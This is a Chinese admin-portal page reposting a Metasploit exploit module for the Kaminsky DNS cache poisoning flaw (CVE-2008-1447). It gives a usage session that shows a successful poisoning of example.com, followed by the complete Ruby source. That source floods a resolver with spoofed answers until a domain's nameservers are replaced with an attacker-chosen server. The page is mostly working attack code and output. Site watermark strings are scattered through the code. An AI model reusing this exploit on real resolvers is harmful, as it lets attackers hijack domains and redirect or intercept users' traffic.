网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > Kaminsky DNS Cache Poisoning Flaw Exploit for Domains  

Kaminsky DNS Cache Poisoning Flaw Exploit for Domains

2008-08-23  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

 ____ ____ __ __
                     / \ / \ | | | |
        ----====####/ /\__\##/ /\ \##| |##| |####====----
                   | | | |__| | | | | |
                   | | ___ | __ | | | | |
  ------======######\ \/ /#| |##| |#| |##| |######======------
                     \____/ |__| |__| \______/
                                                      网管u家u.bitsCN.com
                    Computer Academic Underground
                        http://www.caughq.org
                            Exploit Code 网管u家bitscn.net


===============/========================================================
Exploit ID: CAU-EX-2008-0003
Release Date: 2008.07.23
Title: bailiwicked_domain.rb
Description: Kaminsky DNS Cache Poisoning Flaw Exploit for Domains
Tested: BIND 9.4.1-9.4.2
Attributes: Remote, Poison, Resolver, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Author/Email: I)ruid <druid (@) caughq.org>
                H D Moore <hdm (@) metasploit.com>
===============/========================================================

网管u家www.bitscn.net


Description
===========

网管下载dl.bitscn.com


This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
records for the target domain.

网管论坛bbs_bitsCN_com


  网管朋友网www_bitscn_net

Example
=======

网管有家bitscn.net


# /msf3/msfconsole 网管bitscn_com


                ## ### ## ##
 ## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
                                      ## 网管联盟bitsCN_com


 

网管论坛bbs_bitsCN_com

       =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 73 aux

中国网管论坛bbs.bitsCN.com


msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] >> ADDRESS: A.B.C.D PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

网管下载dl.bitscn.com


b.iana-servers.net.
a.iana-servers.net.

网管u家www.bitscn.net


msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*] Got an NS record: example.com. 171957 IN NS b.iana-servers.net.
[*] Querying recon nameserver for address of b.iana-servers.net....
[*] Got an A record: b.iana-servers.net. 171028 IN A 193.0.0.236
[*] Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*] b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Got an NS record: example.com. 171957 IN NS a.iana-servers.net.
[*] Querying recon nameserver for address of a.iana-servers.net....
[*] Got an A record: a.iana-servers.net. 171414 IN A 192.0.34.43
[*] Checking Authoritativeness: Querying 192.0.34.43 for example.com....

网管有家bitscn.net

[*] a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com 网管网www_bitscn_com
[*] Auxiliary module execution completed 网管u家bitscn.net


msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D 网管u家u.bitsCN.com


dns01.metasploit.com. 网管联盟bitsCN@com


  网管朋友网www_bitscn_net

Credits
======= 网管论坛bbs_bitsCN_com


Dan Kaminsky is credited with originally discovering this vulnerability.

网管朋友网www_bitscn_net


 

网管联盟bitsCN@com

References
========== 中国网管联盟bitsCN.com


http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
http://www.kb.cert.org/vuls/id/800113

网管联盟bitsCN@com


  中国网管论坛bbs.bitsCN.com

Metasploit
========== 网管有家www.bitscn.net


require 'msf/core'
require 'net/dns'
require 'scruby'
require 'resolv' 网管u家bitscn.net


module Msf

网管联盟bitsCN_com


class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary

网管bitscn_com


        include Exploit::Remote::Ip 网管有家www.bitscn.net


        def initialize(info = {})
                super(update_info(info,
                        'Name' => 'DNS BailiWicked Domain Attack',
                        'Description' => %q{
                                This exploit attacks a fairly ubiquitous flaw in DNS implementations which
                                Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target

网管论坛bbs_bitsCN_com


                                domains nameserver entries in a vulnerable DNS cache server. This attack works
                                by sending random hostname queries to the target DNS server coupled with spoofed
                                replies to those queries from the authoritative nameservers for that domain.
                                Eventually, a guessed ID will match, the spoofed packet will get accepted, and

网管bitscn_com


                                the nameserver entries for the target domain will be replaced by the server
                                specified in the NEWDNS option of this exploit.
                        },
                        'Author' => [ 'I)ruid', 'hdm' ],
                        'License' => MSF_LICENSE,
                        'Version' => '$Revision: 5590 $',

网管联盟bitsCN_com


                        'References' =>
                                [
                                        [ 'CVE', '2008-1447' ],
                                        [ 'US-CERT-VU', '8000113' ],
                                        [ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0003.txt' ],

网管网www.bitscn.com


                                ],
                        'DisclosureDate' => 'Jul 21 2008'
                        ))
                        
                        register_options(
                                [

网管u家www.bitscn.net


                                        OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
                                        OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
                                        OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
                                        OptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), 网管网www_bitscn_com
                                        OptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]),
                                        OptInt.new('TTL', [true, 'TTL for the malicious NS entry', 31337]),
                                ], self.class)
                                        

网管联盟bitsCN@com


        end
        
        def auxiliary_commands
                return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable" }
        end
网管有家www.bitscn.net


        def cmd_check(*args)
                targ = args[0] || rhost()
                if(not (targ and targ.length > 0))
                        print_status("usage: check [dns-server]")
                        return
                end 网管u家u.bitsCN.com


                print_status("Using the Metasploit service to verify exploitability...")
                srv_sock = Rex::Socket.create_udp(
                        'PeerHost' => targ,
                        'PeerPort' => 53
                )

网管网www_bitscn_com


                random = false
                ports = []
                lport = nil
                
                1.upto(5) do |i|
                
                        req = Resolv::DNS::Message.new
                        txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" 中国网管论坛bbs.bitsCN.com
                        req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
                        req.rd = 1
                        
                        srv_sock.put(req.encode)
                        res, addr = srv_sock.recvfrom()
                        

网管bitscn_com


                        if res and res.length > 0
                                res = Resolv::DNS::Message.decode(res)
                                res.each_answer do |name, ttl, data|
                                        if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)
                                                t_addr, t_port = $1.split(':') 网管网www.bitscn.com


                                                print_status(" >> ADDRESS: #{t_addr} PORT: #{t_port}")
                                                t_port = t_port.to_i
                                                if(lport and lport != t_port)
                                                        random = true 网管网www.bitscn.com
                                                end
                                                lport = t_port
                                                ports << t_port
                                        end 网管u家u.bitscn@com
                                end
                        end
                end
                
                srv_sock.close
                
                if(ports.length < 5)
                        print_status("UNKNOWN: This server did not reply to our vulnerability check requests")

网管u家u.bitsCN.com

                        return
                end
                
                if(random)
                        print_status("PASS: This server does not use a static source port. Ports: #{ports.join(", ")}")
                        print_status(" This server may still be exploitable, but not by this tool.")
                else

网管联盟bitsCN_com


                        print_status("FAIL: This server uses static source ports and is vulnerable to poisoning")
                end
        end
                
        def run
                target = rhost()
                source = Rex::Socket.source_address(target)
                sport = datastore['SRCPORT']
                domain = datastore['DOMAIN'] + '.' 中国网管联盟bitsCN.com
                newdns = datastore['NEWDNS']
                recons = datastore['RECONS']
                xids = datastore['XIDS'].to_i
                newttl = datastore['TTL'].to_i
                xidbase = rand(20001) + 20000
                
                address = Rex::Text.rand_text(4).unpack("C4").join(".") 网管网www.bitscn.com


                srv_sock = Rex::Socket.create_udp(
                        'PeerHost' => target,
                        'PeerPort' => 53
                ) 网管朋友网www_bitscn_net


                # Get the source port via the metasploit service if it's not set
                if sport.to_i == 0
                        req = Resolv::DNS::Message.new
                        txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com"
                        req.add_question(txt, Resolv::DNS::Resource::IN::TXT)
                        req.rd = 1 网管下载dl.bitscn.com
                        
                        srv_sock.put(req.encode)
                        res, addr = srv_sock.recvfrom()
                        
                        if res and res.length > 0
                                res = Resolv::DNS::Message.decode(res) 网管u家u.bitscn@com
                                res.each_answer do |name, ttl, data|
                                        if (name.to_s == txt and data.strings.join('') =~ /^([^\s]+)\s+.*red\.metasploit\.com/m)
                                                t_addr, t_port = $1.split(':')
                                                sport = t_port.to_i

中国网管联盟bitsCN.com


                                                print_status("Switching to target port #{sport} based on Metasploit service")
                                                if target != t_addr
                                                        print_status("Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!")

网管u家bitscn.net


                                                end
                                        end
                                end
                        end
                end
网管下载dl.bitscn.com


                # Verify its not already poisoned
                begin
                        query = Resolv::DNS::Message.new
                        query.add_question(domain, Resolv::DNS::Resource::IN::NS)
                        query.rd = 0 网管有家www.bitscn.net


                        begin
                                cached = false
                                srv_sock.put(query.encode)
                                answer, addr = srv_sock.recvfrom() 网管网www.bitscn.com


                                if answer and answer.length > 0
                                        answer = Resolv::DNS::Message.decode(answer)
                                        answer.each_answer do |name, ttl, data| 网管u家www.bitscn.net


                                                if((name.to_s + ".") == domain and data.name.to_s == newdns)
                                                        t = Time.now + ttl
                                                        print_status("Failure: This domain is already using #{newdns} as a nameserver") 网管朋友网www_bitscn_net
                                                        print_status(" Cache entry expires on #{t.to_s}")
                                                        srv_sock.close
                                                        disconnect_ip

网管有家www.bitscn.net

                                                        return
                                                end
                                        end
                                        
网管有家www.bitscn.net

                                end
                        end until not cached
                rescue ::Interrupt
                        raise $!
                rescue ::Exception => e
                        print_status("Error checking the DNS name: #{e.class} #{e} #{e.backtrace}")
                end
网管网www.bitscn.com


 

网管有家www.bitscn.net

                res0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver

网管朋友网www_bitscn_net


                print_status "Targeting nameserver #{target} for injection of #{domain} nameservers as #{newdns}"

网管论坛bbs_bitsCN_com


                # Look up the nameservers for the domain
                print_status "Querying recon nameserver for #{domain}'s nameservers..."
                answer0 = res0.send(domain, Net::DNS::NS)
                #print_status " Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities"

网管联盟bitsCN_com


                barbs = [] # storage for nameservers
                answer0.answer.each do |rr0|
                        print_status " Got an #{rr0.type} record: #{rr0.inspect}"
                        if rr0.type == 'NS'
                                print_status " Querying recon nameserver for address of #{rr0.nsdname}..."
                                answer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname

网管下载dl.bitscn.com

                                #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities"
                                answer1.answer.each do |rr1|
                                        print_status " Got an #{rr1.type} record: #{rr1.inspect}"
                                        res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) 网管有家www.bitscn.net
                                        print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..."
                                        answer2 = res2.send(domain)
                                        if answer2 and answer2.header.auth? and answer2.header.anCount >= 1
                                                nsrec = {:name => rr0.nsdname, :addr => rr1.address} 网管有家www.bitscn.net
                                                barbs << nsrec
                                                print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as"
                                        end
                                end 网管联盟bitsCN@com
                        end
                end
网管u家bitscn.net


                if barbs.length == 0
                        print_status( "No DNS servers found.")
                        srv_sock.close
                        disconnect_ip
                        return
                end

网管网www_bitscn_com


                # Flood the target with queries and spoofed responses, one will eventually hit
                queries = 0
                responses = 0 网管bitscn_com


                connect_ip if not ip_sock 网管u家u.bitscn@com


                print_status( "Attempting to inject poison records for #{domain}'s nameservers into #{target}:#{sport}...") 网管u家u.bitscn@com


                while true
                        randhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname

网管网www.bitscn.com


                        # Send spoofed query
                        req = Resolv::DNS::Message.new
                        req.id = rand(2**16)
                        req.add_question(randhost, Resolv::DNS::Resource::IN::A) 网管下载dl.bitscn.com


                        req.rd = 1 网管下载dl.bitscn.com


                        buff = (
                                Scruby::IP.new(
                                        #:src => barbs[0][:addr].to_s,
                                        :src => source,
                                        :dst => target,

网管联盟bitsCN_com


                                        :proto => 17
                                )/Scruby::UDP.new(
                                        :sport => (rand((2**16)-1024)+1024).to_i,
                                        :dport => 53
                                )/req.encode 网管联盟bitsCN@com
                        ).to_net
                        ip_sock.sendto(buff, target)
                        queries += 1
                        
                        # Send evil spoofed answer from ALL nameservers (barbs[*][:addr])
                        req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address))

网管下载dl.bitscn.com


                        req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns)))
                        req.add_additional(newdns, newttl, Resolv::DNS::Resource::IN::A.new(address)) # Ignored
                        req.qr = 1
                        req.aa = 1

中国网管论坛bbs.bitsCN.com


                        xidbase.upto(xidbase+xids-1) do |id|
                                req.id = id
                                barbs.each do |barb|
                                        buff = (
                                                Scruby::IP.new(

网管联盟bitsCN@com

                                                        #:src => barbs[i][:addr].to_s,
                                                        :src => barb[:addr].to_s,
                                                        :dst => target,
中国网管联盟bitsCN.com

                                                        :proto => 17
                                                )/Scruby::UDP.new(
                                                        :sport => 53,
                                                        :dport => sport.to_i 网管有家www.bitscn.net
                                                )/req.encode
                                        ).to_net
                                        ip_sock.sendto(buff, target)
                                        responses += 1
网管联盟bitsCN_com

                                end
                        end 网管下载dl.bitscn.com


                        # status update
                        if queries % 1000 == 0
                                print_status("Sent #{queries} queries and #{responses} spoofed responses...")
                        end 中国网管论坛bbs.bitsCN.com


                        # every so often, check and see if the target is poisoned...
                        if queries % 250 == 0
                                begin
                                        query = Resolv::DNS::Message.new
                                        query.add_question(domain, Resolv::DNS::Resource::IN::NS)

网管u家bitscn.net

                                        query.rd = 0
        
                                        srv_sock.put(query.encode)
                                        answer, addr = srv_sock.recvfrom() 网管网www_bitscn_com


                                        if answer and answer.length > 0
                                                answer = Resolv::DNS::Message.decode(answer)
                                                answer.each_answer do |name, ttl, data|
                                                        if((name.to_s + ".") == domain and data.name.to_s == newdns)

网管有家bitscn.net

                                                                print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")
                                                                srv_sock.close
                                                                disconnect_ip

网管朋友网www_bitscn_net


                                                                return
                                                        end
                                                end

网管下载dl.bitscn.com


                                        end
                                rescue ::Interrupt
                                        raise $!
                                rescue ::Exception => e
                                        print_status("Error querying the DNS name: #{e.class} #{e} #{e.backtrace}") 中国网管论坛bbs.bitsCN.com
                                end
                        end 网管u家www.bitscn.net


                end 中国网管联盟bitsCN.com


        end

网管u家u.bitsCN.com


end
end

网管bitscn_com


网管bitscn_com

 
TAGs         >   "   ##   the   end   and   for   target   print_status      
 上一篇:IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit   下一篇:BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (py)
相关文章列表
Kaminsky DNS Cache Poisoning Flaw Exploit for Domains 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Scripteen Free Image Hosting Script 1.
2.PPMate PPMedia Class ActiveX Control B
3.Apache mod_jk 1.2.19 Remote Buffer Ove
4.Microsoft Access (Snapview.ocx 10.0.55
5.Cisco IOS 12.3(18) FTP Server Remote E
6.Trend Micro OfficeScan ObjRemoveCtrl A
7.Windows Media Encoder wmex.dll ActiveX
8.Linux Kernel <= 2.6.20 with DCCP Su
9.Simple Machines Forum <= 1.1.5 Admi
10.NaviCOPA Web Server 2.01 Remote Buffer
最新推荐文章:
1.Cheats Complete Website 1.1.1 (itemid)
2.Drinks Complete Website 2.1.0 (drinkid
3.BitDefender Online Scanner 8 ActiveX H
4.PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA
5.PHP COM extensions (inconsistent Win32
6.PHP 4.4.6 crack_opendict() Local Buffe
7.Internet Explorer ActiveX bgColor Prop
8.CVSTrac 2.0.0 Post-Attack Database Res
9.GuppY <= 4.5.16 Remote Commands Exe
10.Trend Micro VirusWall Buffer Overflow
网管论坛交流:
·什么样的游戏,什么样的爱情.
·大家来开心一下吧---看了会很开心的东西-
·中国人不可不知道的知识
·@@小鹏◎◎小鹏同志与某位女明星亲密接触
·◎◎小鹏◎◎发现不明生物,居然正在交配
·[图文]^^^版主是什么?????
·泡论坛的女人是好女人
·做个“水性杨花”的女人
·献给mm俱乐部的所有mm
·深圳一集团企业电脑基础应用培训教程